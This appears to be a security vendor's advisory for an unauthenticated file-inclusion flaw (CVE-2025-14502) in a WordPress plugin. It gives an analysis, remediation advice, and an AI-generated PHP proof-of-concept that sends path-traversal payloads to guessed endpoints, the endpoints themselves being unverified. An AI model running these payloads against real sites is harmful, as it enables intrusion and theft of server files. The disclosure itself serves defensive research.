Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-14502: News and Blog Designer Bundle <= 1.1 – Unauthenticated Local File Inclusion (news-and-blog-designer-bundle)

CVE ID CVE-2025-14502
Plugin news-and-blog-designer-bundle
Severity Critical (CVSS 9.8)
CWE 98
Vulnerable Version 1.1
Patched Version
Disclosed January 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14502 (metadata-based):
This vulnerability is an unauthenticated Local File Inclusion (LFI) in the News and Blog Designer Bundle WordPress plugin, affecting all versions up to and including 1.1. The flaw resides in the handling of the ‘template’ parameter, allowing attackers to include and execute arbitrary PHP files on the server. The CVSS 3.1 score of 9.8 (Critical) reflects its network-based attack vector, low attack complexity, and high impact on confidentiality, integrity, and availability.

Atomic Edge research infers the root cause is CWE-98, Improper Control of Filename for Include/Require Statement. The plugin likely uses a user-supplied value from the ‘template’ parameter directly within a PHP include or require statement without proper validation. This conclusion is inferred from the CWE classification and the vulnerability description, as no source code diff is available for confirmation. The plugin fails to sanitize or restrict the file path, permitting directory traversal sequences or absolute paths.

Exploitation involves sending an HTTP request to a vulnerable endpoint that processes the ‘template’ parameter. Based on WordPress plugin patterns, this endpoint is likely a publicly accessible AJAX handler or a direct plugin file. An attacker can craft a request with a ‘template’ parameter containing a path to a malicious PHP file, such as ‘../../uploads/evil.php’ or a full server path. Successful exploitation leads to the execution of the included file’s PHP code.

Remediation requires implementing strict validation and sanitization of the user-controlled filename. The fix should validate the template parameter against a whitelist of allowed, safe file names. The code must also ensure the parameter does not contain directory traversal sequences (../) or absolute paths. Implementing proper capability checks to restrict access to authenticated users would also mitigate the unauthenticated attack vector.

The impact of successful exploitation is severe. Attackers can achieve remote code execution by including uploaded PHP files, as described. This grants full control over the server. The vulnerability also allows bypassing access controls to read sensitive system files like /etc/passwd. Attackers can leverage this to steal data, escalate privileges, or establish a persistent backdoor on the compromised WordPress site.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-14502 - News and Blog Designer Bundle <= 1.1 - Unauthenticated Local File Inclusion
<?php
/**
 * Proof of Concept for CVE-2025-14502.
 * This script attempts to exploit an unauthenticated Local File Inclusion (LFI) vulnerability
 * via the 'template' parameter in the News and Blog Designer Bundle WordPress plugin.
 * The exact vulnerable endpoint is inferred from common WordPress plugin patterns.
 * Two potential attack vectors are tested: a direct plugin file and the admin AJAX handler.
 */

$target_url = 'https://example.com'; // CHANGE THIS TO THE TARGET SITE URL

// Payload: Attempt to include a common sensitive file to confirm LFI.
// If file upload is possible, an attacker would use a path to their uploaded PHP shell.
$lfi_payloads = [
    '../../../../../../etc/passwd', // Unix system file
    'C:\Windows\System32\drivers\etc\hosts', // Windows system file
    // In a real attack, this would be a path to an uploaded .php file, e.g.,
    // '../../uploads/2025/04/shell.php'
];

// Candidate endpoints based on WordPress plugin structures.
// The plugin slug is 'news-and-blog-designer-bundle'.
$endpoints = [
    '/wp-content/plugins/news-and-blog-designer-bundle/includes/template-loader.php', // Common direct file pattern
    '/wp-admin/admin-ajax.php' // Common AJAX handler
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

foreach ($endpoints as $endpoint) {
    $url = $target_url . $endpoint;
    echo "[*] Testing endpoint: $urln";

    foreach ($lfi_payloads as $payload) {
        // For AJAX endpoint, the 'action' parameter is required. We use a plausible guess.
        if (strpos($endpoint, 'admin-ajax.php') !== false) {
            $postData = [
                'action' => 'nbd_load_template', // Inferred common action name pattern
                'template' => $payload
            ];
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
        } else {
            // For direct file access, use GET with the template parameter.
            $attack_url = $url . '?template=' . urlencode($payload);
            curl_setopt($ch, CURLOPT_URL, $attack_url);
            curl_setopt($ch, CURLOPT_POST, false);
        }

        $response = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);

        echo "  [>] Payload: $payload | HTTP: $httpCode | Length: " . strlen($response) . "n";
        // Check for indicators of successful file inclusion.
        if (strpos($response, 'root:') !== false || strpos($response, '127.0.0.1') !== false) {
            echo "  [+] LIKELY SUCCESS: Potential file inclusion detected.n";
            echo "  [+] Sample response (first 500 chars): " . substr($response, 0, 500) . "nn";
        }
    }
}

curl_close($ch);
echo "[+] PoC execution complete.n";
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School